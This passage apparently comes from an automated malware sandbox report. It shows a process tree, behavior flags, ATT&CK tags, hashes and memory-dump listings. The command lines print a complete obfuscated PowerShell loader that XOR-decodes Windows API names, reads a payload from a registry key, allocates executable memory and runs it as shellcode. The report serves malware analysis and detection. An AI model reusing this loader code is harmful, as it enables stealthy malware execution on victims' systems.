Bl'mu5SnFUd1Va4Co0Ta9Tr1Um2Sk5MoBFo4El6Su5FaBJi5TnFBo0PaDPu1StAUn0La9Re2to4Re0MaDfo1SmAPe5Sc5Re3Mi2Qu1Fr5Ch0ImDTr1Mu4Po1Pa0St1UnEBr5Du3Fi2Pa0In3Im2Pa1Ni5Bl0PrFPa2ArBIn0BrFTa0Tn9ka2Ma6Kn4Jo1Vr4Ga1Dh2Pl1Pu1WhEHa0an9ta1Mi4Un5Lo7Ag5ReBNu4IsBUd0Sa3Af4TuACo4HaBOl4NoBFr4MaBIn4CeBbr4StBBi5Ba7Ar5NiBSt4HoBSk0An3Th4Ob8Ci4PoBZe4LaBUd4UnBBj5Ch7Re5OsBCr4PrBPa0Eg3Bl4reFMi5Eg2Fa'Rr;TiUPrrNiaSunTriGafAaeRerBuoNeuCrsLo9Di Ka`$TydFlrFisShaDklStgSp8Ge;Or`$LyeUdmAlbbaoHyuNorLagSkeOuoOmiFusloeEnmUdeTanUdtGa=St(FlGMieEvtUd-FiIOvtHieFomPePChrUnoAcpfueWirKjtCryPh Re-BePApaHutSthPl Br'PrHOsKdoCPoUAr:Ag\BjPNbrAdiEpmDafBaaSkkBrtEfoRerGaoStpPolSpsUnnSuiSenHngtieAcnKo\RrhDeoStrClmStoPenLyaMolDetAf'Su)sl.BrFNolBauKrtUntNieHarMa1Ca5Op0Co;Mu`$VadInrStsBraJolSegAf9Tt Ax=Ja MeHSkTWiBWi Ba'Te5LiFPo1LiFPr0Mu9Ex0Ox8Us1AlADa1Ra7Sa1RoCVo5KoBUs4Fr6An5ImBTi2Me0Tr2Di8To0tc2sm0He8Ov0CiFUn1FrECi1Se6Ku5Ol5Br3Yn8Ap1Ta4su1Eu5so0TiDEp1BuEAr0Dr9Fo0CiFLa2As6Be4Ko1sa4Sk1Ib3BoDLa0Kr9Hv1As4Me1Ud6Eg3Kr9Lu1UnAPi0Be8Di1LiESp4RoDOv4peFKl2bj8Un0LsFTu0Ko9Su1Ho2Ba1Ho5il1BoCOm5Sc3Ex5TeFMa1trEKi1Ne6Ka1Fd9In1Ho4In0AmESk0Sk9Pr1JiCEk1SpEGe1In4Ab1Gu2pe0Un8Gl1AgEAb1Am6Ca1afETo1To5Be0chFpe5Pr2Sy'Pu;HoUEkrCuawinMuiCefLeeAdrJuoAnuFosPe9Re Be`$FidAnrBosBeaTflEygHe9Di;Ba`$HyeFomPobSaoinuBrrUngSaenooAfiHasTeePrmYoeBonfatCa0Sl An=Si reHEnTMaBKu He'fi2mi0Sk2Ly8Kr0Te2Om0af8po0TaFHe1NoESu1An6Ad5Es5Gi2Du9Pa0KiEin1Di5in0AtFEn1Re2Tr1Gu6Pi1SuEBe5Pl5Ta3St2De1Co5Cl0UdFIs1BaEWi0Ga9Ku1Ti4Un0VaBno2Fr8Ha1DiEDe0Re9Sl0InDVa1re2En1an8Or1QuESp0Ha8Bo5Sk5Bi3Fu6Su1KlARa0Ko9To0Ad8Vr1Tr3Eg1keASe1De7Sp2He6Pr4Ta1Fa4to1re3si8Ha1Wi4Pr0SpBKr0Ap2fi5Pr3Ef5BeFGe1SvFDi0Va9Fe0Om8Be1SkAHy1Ud7Na1FoCVa5Br7Fu5LaBVr4NuBIn5Ch7Su5stBFo5LaBUn5FrFIn3me3Fe0Ma2Ag0ro9af1DiABl1Ja8Ex1Fj2Sp1SkDGr1Ba4Ti0An9re1Un6Ur4Ov8Kn5Id7Sh5SmBOp4Ko8Ga4UnEed4Ba3No5Di2pr'Ta;vaUanrlaaCanRoiSefSoeBarAfoUduNisTa9Ex Ov`$EleZemMebSnoPiuBrrAvgTaeAloRiiadsAmeOrmTreConFutGo0Tu;Mi`$StsHeiCozSoeSn=Vi`$GadParspsviamolFrgun.licUnoFruAsnBitGl-Ps3Ab5An8As;No`$TieChmImbTroceuInrChgSueAboUniTrsBreDamOueninPatSk1Be Af=La UnHStTbaBDe Pa'Be2cl0Sf2Re8St0Bo2Re0ba8Ra0EfFPr1PeEsu1Ba6de5Ag5Gr2Ac9Va0GsEFj1Ud5Re0DuFIn1Sn2Po1Ma6In1KaEHo5Ek5Vi3St2Ze1Th5Ci0CoFSh1UnETu0Or9Ar1Tu4To0miBsa2In8Li1IoECh0Op9Un0MiDVr1Fr2an1Po8An1AnEUd0Sv8Co5Em5Se3Ta6mo1FoAOp0Ko9Od0El8Un1Te3Cy1TlABo1Di7Af2Ta6To4Ug1Ge4Un1St3ea8Wi1Ve4To0BoBHe0Jo2Am5Fr3Fo5NeFDi1EjFfi0Sy9Pr0Ka8ek1IvAHa1Ch7up1FrCNa5Pl7Fe5CyBAu4Ya8Pl4CoESy4Sk3Ol5Su7Hy5LiBNe5SpFFr1Un4Fi0Pr9Ca1St2Tr5To7Di5PhBEr5SeFOp0Se8en1Ko2Tu0in1Cl1DaEHj5Un2Ra'Za;maUSerSeaDinHoiTefHueAcrEkoUduKosCa9Fo Go`$HyekimOmbUnoReuNorPegCyeWaoRriArsVkeComCaeVinUftFi1Ln;In`$IneBymTybfioSeuFarMygLjeRaoSaiCasPeeNsmPueUnnUntbi2Kl Pr=Sk PlHTaTKoBVa Ci'Be5OlFBu0ImDSe1UnANi0Sn9Ud2Sy4Do0Ga9Ph0spESi1He5Co1Al6Ap1SpEBr5GjBHe4ha6Hr5TrBIn2Ni0Se2Sl8Ki0Ko2ra0Gh8Ho0EnFSp1OvEHy1be6Sv5Ig5ch2Un9Un0OuEIn1Ov5Dr0RdFLo1Dz2Fj1Ls6Pa1KvEma5Fi5St3To2Cr1So5Br0PrFBi1PaEAn0Bo9Pl1Ve4Pr0GrBBe2Id8Tr1DiEWi0Pa9hi0KlDRu1Fo2Je1In8Be1BaEAs0Pl8cl5Be5Re3En6Ch1foATh0Un9Ha0En8Sa1Ni3Gr1hjAno1Ta7Un2Ba6Th4Ta1Fa4Am1Fr3ScCBi1UnETr0UrFKr3InFce1SpEBr1El7Mi1SiESe1HeCOu1OpALi0GeFDi1DrEDe3BeDOv1Un4An0Fo9Ub3trDBj0SlEEv1Re5Si1Re8Em0VkFSu1fo2Az1En4Ca1Hu5Ne2EkBLu1Bu4Ry1Sa2Ob1Te5me0StFDo1GeEBa0Is9Ad5Fe3Qu5SoFIn3ho3En0Ku2Ho0Ch9ud1LiARy1sk8Ty1Hy2Re1stDBl1Sk4Mi0Be9Ga1Da6Un4Ek8St5Sa7Me5AnBac5Al3Tr3AfCDr3doFAm2SiFSo5SkBSn3IsBny5ha3De2Ph0ny3Br2Bj1Un5pr0ThFLe2UnBBu0MuFAd0Fe9Ga2Ad6Si5La7Ls2Bi0Br3Ty2Bi1En5Mi0daFGa2HuBBr0SeFad0Sl9Be2Hu6Sk5St2Se5CyBGa5Ud3Pe2no0Ex2gaDKi1Er4ad1Pi2Yo1HiFSt2Li6As5Ud2Fo5fi2Dr5Ma2Ct'Ar;trUPhrBaaCinAmiPrfheeDarSaoHauCasUd9Ch Pr`$DieLomClbdioNouSarregSueInoPyiMasceeMamAneFenTitbe2Da;Tr`$BrePrmAcbGuoKnuFrrStgMeeUnoauiunsLaeSamExerinhatRe3Lu Su=Se UnHCrTRyBSk Sk'Mi5VeFIn0DeDSa1UnAHa0Rd9ko2Fo4Bo0De9Ti0MoEOu1Pi5Cy1De6Fo1TrEFe5Fi5Bu3Ba2Sk1St5An0StDDi1Th4Bl1Co0Wu1EnENa5Pe3Br5PrFPa1Ch4Mo0st9Ne1Bo2Br5Un7St5OvFid0StDsk1PrASk0in9Pl2Te4Hi1Kn5Au0unFLu5So2Ef'La;NyURerDeaBrnDaiBafSteHiridoFuukusSu9Me Ru`$VeeRemRibGtoBeuFarLegFoeAtoInidisReeFomCoeBrnKotAp3Ex#Si;""";;Function embourgeoisement9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Redeclared63 = $Redeclared63 + $HS.Substring($i, 1); } $Redeclared63;}$Stileemner0 = embourgeoisement9 'DiIImEPuXbi ';$Stileemner2 = embourgeoisement9 'KusBrtPoaBerSptSt-TejFdoArbps ';$Stileemner1= embourgeoisement9 $Katakombens;;if([IntPtr]::size -eq 8){ & ($Stileemner2) { param($a) powershell $a } -RunAs32 -Argument $Stileemner1 | wait-job | Receive-Job;}else{ & ($Stileemner0) $Stileemner1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4232

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 123); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Czigany0=HTB '2802080F1E16551F1717';$Czigany1=HTB '361218091408141D0F552C12154849552E15081A1D1E351A0F120D1E361E0F13141F08';$Czigany2=HTB '3C1E0F2B0914183A1F1F091E0808';$Czigany3=HTB '2802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855331A151F171E291E1D';$Czigany4=HTB '080F0912151C';$Czigany5=HTB '3C1E0F36141F0E171E331A151F171E';$Czigany6=HTB '292F280B1E18121A17351A161E575B33121F1E390228121C575B2B0E19171218';$Czigany7=HTB '290E150F12161E575B361A151A1C1E1F';$Czigany8=HTB '291E1D171E180F1E1F3F1E171E1C1A0F1E';$Czigany9=HTB '3215361E1614090236141F0E171E';$Uraniferous0=HTB '36023F1E171E1C1A0F1E2F020B1E';$Uraniferous1=HTB '38171A0808575B2B0E19171218575B281E1A171E1F575B3A15081238171A0808575B3A0E0F1438171A0808';$Uraniferous2=HTB '32150D14101E';$Uraniferous3=HTB '2B0E19171218575B33121F1E390228121C575B351E0C2817140F575B2D12090F0E1A17';$Uraniferous4=HTB '2D12090F0E1A173A17171418';$Uraniferous5=HTB '150F1F1717';$Uraniferous6=HTB '350F2B09140F1E180F2D12090F0E1A17361E16140902';$Uraniferous7=HTB '323E23';$Uraniferous8=HTB '27';Set-Alias -name Uraniferous9 -value $Uraniferous7;function fkp {Param ($v_m, $v_p) ;$drsalg0 =HTB '5F0D0E15165B465B53203A0B0B3F14161A1215264141380E09091E150F3F14161A1215553C1E0F3A08081E161917121E0853525B075B2C131E091E563419111E180F5B005B5F24553C1714191A173A08081E16191702381A18131E5B563A151F5B5F24553714181A0F12141555280B17120F535F2E091A15121D1E09140E08435220564A26553E0A0E1A1708535F3801121C1A15024B525B0652553C1E0F2F020B1E535F3801121C1A15024A52';Uraniferous9 $drsalg0;$drsalg5 = HTB '5F0D1A09241C0B1A5B465B5F0D0E1516553C1E0F361E0F13141F535F3801121C1A150249575B202F020B1E2026265B3B535F3801121C1A150248575B5F3801121C1A15024F5252';Uraniferous9 $drsalg5;$drsalg1 = HTB '091E0F0E09155B5F0D1A09241C0B1A5532150D14101E535F150E1717575B3B53202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855331A151F171E291E1D2653351E0C563419111E180F5B2802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855331A151F171E291E1D5353351E0C563419111E180F5B32150F2B0F0952575B535F0D0E1516553C1E0F361E0F13141F535F3801121C1A15024E52525532150D14101E535F150E1717575B3B535F0D241652525252575B5F0D240B5252';Uraniferous9 $drsalg1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$drsalg2 = HTB '5F2D2F395B465B203A0B0B3F14161A1215264141380E09091E150F3F14161A1215553F1E1D12151E3F02151A1612183A08081E161917025353351E0C563419111E180F5B2802080F1E1655291E1D171E180F121415553A08081E16191702351A161E535F3801121C1A1502435252575B202802080F1E1655291E1D171E180F121415553E16120F553A08081E16191702390E12171F1E093A18181E0808264141290E1552553F1E1D12151E3F02151A16121836141F0E171E535F3801121C1A150242575B5F1D1A17081E52553F1E1D12151E2F020B1E535F2E091A15121D1E09140E084B575B5F2E091A15121D1E09140E084A575B202802080F1E1655360E170F12181A080F3F1E171E1C1A0F1E2652';Uraniferous9 $drsalg2;$drsalg3 = HTB '5F2D2F39553F1E1D12151E381415080F090E180F1409535F3801121C1A15024D575B202802080F1E1655291E1D171E180F12141555381A171712151C3814150D1E150F12141508264141280F1A151F1A091F575B5F0D1A09240B1A091A161E0F1E09085255281E0F32160B171E161E150F1A0F1214153D171A1C08535F3801121C1A15024C52';Uraniferous9 $drsalg3;$drsalg4 = HTB '5F2D2F39553F1E1D12151E361E0F13141F535F2E091A15121D1E09140E0849575B5F2E091A15121D1E09140E0848575B5F0D090F575B5F0D1A09240B1A091A161E0F1E09085255281E0F32160B171E161E150F1A0F1214153D171A1C08535F3801121C1A15024C52';Uraniferous9 $drsalg4;$drsalg5 = HTB '091E0F0E09155B5F2D2F395538091E1A0F1E2F020B1E5352';Uraniferous9 $drsalg5 ;}$kk = HTB '101E09151E174849';$drsalg6 = HTB '5F0D1A09240D1A5B465B202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A172641413C1E0F3F1E171E1C1A0F1E3D14093D0E15180F1214152B1412150F1E0953531D100B5B5F10105B5F2E091A15121D1E09140E084F52575B533C3F2F5B3B532032150F2B0F0926575B202E32150F484926575B202E32150F484926575B202E32150F484926525B532032150F2B0F0926525252';Uraniferous9 $drsalg6;$var_nt = fkp $Uraniferous5 $Uraniferous6;$drsalg7 = HTB '5F3302091A18121D140916485B465B5F0D1A09240D1A5532150D14101E532032150F2B0F09264141211E0914575B484E43575B4B03484B4B4B575B4B034F4B52';Uraniferous9 $drsalg7;$drsalg8 = HTB '5F1409125B465B5F0D1A09240D1A5532150D14101E532032150F2B0F09264141211E0914575B4B034A4B4B4B4B4B575B4B03484B4B4B575B4B034F52';Uraniferous9 $drsalg8;$embourgeoisement=(Get-ItemProperty -Path 'HKCU:\Primfaktoroplsningen\hormonalt').Flutter150;$drsalg9 = HTB '5F1F09081A171C5B465B202802080F1E16553814150D1E090F2641413D091416391A081E4D4F280F0912151C535F1E1619140E091C1E1412081E161E150F52';Uraniferous9 $drsalg9;$embourgeoisement0 = HTB '202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A1726414138140B02535F1F09081A171C575B4B575B5B5F3302091A18121D14091648575B484E4352';Uraniferous9 $embourgeoisement0;$size=$drsalg.count-358;$embourgeoisement1 = HTB '202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A1726414138140B02535F1F09081A171C575B484E43575B5F140912575B5F0812011E52';Uraniferous9 $embourgeoisement1;$embourgeoisement2 = HTB '5F0D1A0924090E15161E5B465B202802080F1E1655290E150F12161E5532150F1E09140B281E090D12181E0855361A0908131A172641413C1E0F3F1E171E1C1A0F1E3D14093D0E15180F1214152B1412150F1E09535F3302091A18121D14091648575B533C3F2F5B3B532032150F2B0F0926572032150F2B0F0926525B53202D14121F26525252';Uraniferous9 $embourgeoisement2;$embourgeoisement3 = HTB '5F0D1A0924090E15161E5532150D14101E535F140912575F0D1A0924150F52';Uraniferous9 $embourgeoisement3#"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
93678e82d776686aa54c42b8a98e6cbc

SHA1
802939dfed99ac74814c4371388b204c5810241d

SHA256
da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841

SHA512
0b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
1f17c28ff309a465563f40849bd49d91

SHA1
d06c61dc65f5a295907606d649e5181d8decf897

SHA256
3889aa051a748da6d401dca2660190875301555754affef90504add9fbfcd2e2

SHA512
f72fdeb4c81e71d4dca820eefd18f1100243a2c733764c4c509bcccd57aafe4c30785f24cf1d25d92b7c6221dda9d829a26b9ccccdfb260a41136c0b6d6e479e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
e9b9f98384bbaf41029db9f4cf059bcf

SHA1
3dae92c3aa823cba869e5f8ae45fe2b24350e96f

SHA256
10eaa04454d55a23ccaead3a78304d90230c44b9cadcf064999a4b0b3c1e0b73

SHA512
9ee912f86ab7212d0e5e842d73518aae08aae70dac743ebc1456597510c5e17d9f178b8da4504f99fe4bc96387633cd05706950bac082703954cf50390f56e4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
fc1c235dd7afd8bb8e63589675ef5f59

SHA1
065a02f968cce83a433ed73254c8bf7971706aa8

SHA256
266bfbc087cc41131f6bc8b71b36d69ca83133a090b5efe918fb1cc7b4484dce

SHA512
d764e05b628e3fa6d268354ffb62acf7ce4416eb9922a65f73feb19c117db88cc6ab9d3d6fa88ab81459a5e87a5e4e46d38435b2519a5af009c06cf6ae8749f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
ec0d3dd7a4d751c5aede09090582a385

SHA1
e949ffa92f720683d0100bbbc862597c5dc6851d

SHA256
f7a3c3c4b69a2f49b2bd018cd7b50e00022a15d12397531bfbfc62e07cd83b90

SHA512
931b5a08ce0d001e44947c484f05ca11493e338570e2a345a52041e02a55d955c52bf7867f643f0a5c7ca7db2b245a6acdec05ba3337b4d570075511d185f7c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
54KB

MD5
c8a0be2377ff698ed98bb304f2f31975

SHA1
870abe684e976541b5ec33a83836a0ad30b4c99b

SHA256
ee37771af8311dfc81216b115cfcf85318087b828a6b566566bfa9fd441b79a1

SHA512
a08e498550203d7a45ee0a3a1aefc9b920a3f488fb6b337b37ae3faa816394cb8d2432b62eebd7b7b8706a2db1e9575c3043b8ece094ff17e656f68dd1ac7ffd

Download Submit
memory/2304-144-0x00000000067C0000-0x00000000067DE000-memory.dmp

Filesize
120KB

Download
memory/2304-147-0x0000000006D90000-0x0000000006DAA000-memory.dmp

Filesize
104KB

Download
memory/2304-140-0x0000000005890000-0x0000000005EB8000-memory.dmp

Filesize
6.2MB

Download
memory/2304-141-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/2304-142-0x0000000006030000-0x0000000006096000-memory.dmp

Filesize
408KB

Download
memory/2304-143-0x00000000060D0000-0x0000000006136000-memory.dmp

Filesize
408KB

Download
memory/2304-138-0x0000000000000000-mapping.dmp

Download
memory/2304-139-0x0000000005160000-0x0000000005196000-memory.dmp

Filesize
216KB

Download
memory/2680-146-0x0000000007A70000-0x00000000080EA000-memory.dmp

Filesize
6.5MB

Download
memory/2680-145-0x0000000000000000-mapping.dmp

Download
memory/2680-150-0x0000000007690000-0x0000000007726000-memory.dmp

Filesize
600KB

Download
memory/2680-151-0x0000000007620000-0x0000000007642000-memory.dmp

Filesize
136KB

Download
memory/2680-152-0x00000000086A0000-0x0000000008C44000-memory.dmp

Filesize
5.6MB

Download
memory/2680-153-0x00000000072E0000-0x00000000073E0000-memory.dmp

Filesize
1024KB

Download
memory/4232-132-0x0000000000000000-mapping.dmp

Download
memory/4232-137-0x00007FFAB1DA0000-0x00007FFAB2861000-memory.dmp

Filesize
10.8MB

Download
memory/4232-136-0x000001FBD0D80000-0x000001FBD0F8A000-memory.dmp

Filesize
2.0MB

Download
memory/4232-135-0x00007FFAB1DA0000-0x00007FFAB2861000-memory.dmp

Filesize
10.8MB

Download
memory/4232-134-0x000001FBD09F0000-0x000001FBD0B66000-memory.dmp

Filesize
1.5MB

Download
memory/4232-133-0x000001FBCFB40000-0x000001FBCFB62000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing